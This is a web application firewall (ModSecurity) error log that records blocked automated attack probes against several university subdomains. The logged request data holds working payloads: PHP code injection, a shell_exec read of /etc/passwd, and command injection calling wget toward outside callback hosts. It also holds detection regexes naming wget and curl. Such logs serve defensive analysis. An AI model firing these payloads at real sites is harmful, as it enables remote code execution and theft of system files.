[Tue Aug 29 11:30:30.513196 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAOIvUgAAAAM"]
[Tue Aug 29 11:30:30.515263 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPmhLQAAAAV"]
[Tue Aug 29 11:30:30.535406 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAANjpyYAAAAT"]
[Tue Aug 29 11:30:31.363139 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10Z8Co-f0AAAPDnw0AAAAP"]
[Tue Aug 29 11:30:31.367992 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10Z8Co-f0AAAOM4WYAAAAU"]
[Tue Aug 29 11:30:31.389681 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10Z8Co-f0AAANh1rIAAAAA"]
[Tue Aug 29 11:30:32.621516 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10aMCo-f0AAAPXAl0AAAAi"]
[Tue Aug 29 11:30:32.644292 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOH4T4AAAAH"]
[Tue Aug 29 11:30:32.663924 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOH4T8AAAAH"]
[Tue Aug 29 11:30:32.665243 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPDnxEAAAAP"]
[Tue Aug 29 11:30:32.677491 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOKNoMAAAAK"]
[Tue Aug 29 11:30:32.705523 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOOuVQAAAAW"]
[Tue Aug 29 11:30:33.440098 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAOOuVkAAAAW"]
[Tue Aug 29 11:30:33.462625 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPpWcUAAAAI"]
[Tue Aug 29 11:30:33.480471 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAOM4W4AAAAU"]
[Tue Aug 29 11:30:33.584390 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPDnxcAAAAP"]
[Tue Aug 29 11:30:33.645417 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10acCo-f0AAAPDnxoAAAAP"]
[Tue Aug 29 11:30:33.656394 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPv-EIAAAAM"]
[Tue Aug 29 11:30:34.326910 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg38om3ff863t57.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAANh1rgAAAAA"]
[Tue Aug 29 11:30:34.333153 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPpWccAAAAI"]
[Tue Aug 29 11:30:34.338998 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPpWccAAAAI"]
[Tue Aug 29 11:30:34.368604 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg6oudie463d6ok.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPDnxwAAAAP"]
[Tue Aug 29 11:30:34.369498 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPv-EQAAAAM"]
[Tue Aug 29 11:30:34.397558 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10asCo-f0AAAPOhY0AAAAa"]
[Tue Aug 29 11:30:34.405083 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPXAmYAAAAi"]
[Tue Aug 29 11:30:34.409813 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPv-EUAAAAM"]
[Tue Aug 29 11:30:34.417281 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlghtyrt9ok6g4pg.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPahv4AAAAL"]
[Tue Aug 29 11:30:34.428929 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgx4rg1q3phezam.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPOhY4AAAAa"]
[Tue Aug 29 11:30:34.440301 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgzsib3147jsd19.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAO8750AAAAF"]
[Tue Aug 29 11:30:34.442928 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAOOuV0AAAAW"]
[Tue Aug 29 11:30:34.449216 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAANjpzAAAAAT"]
[Tue Aug 29 11:30:34.460646 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPDnx8AAAAP"]
[Tue Aug 29 11:30:34.461021 2023] [:error] [pid 1008] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPw@TwAAAAR"]
[Tue Aug 29 11:30:34.467354 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPDnx8AAAAP"]
[Tue Aug 29 11:30:34.468063 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPOhZAAAAAa"]
[Tue Aug 29 11:30:34.472625 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAOOuV4AAAAW"]
[Tue Aug 29 11:30:34.479082 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAOOuV4AAAAW"]
[Tue Aug 29 11:30:35.347417 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAO8758AAAAF"]
[Tue Aug 29 11:30:35.351216 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPiBgUAAAAB"]
[Tue Aug 29 11:30:35.354358 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10a8Co-f0AAAPmhMQAAAAV"]
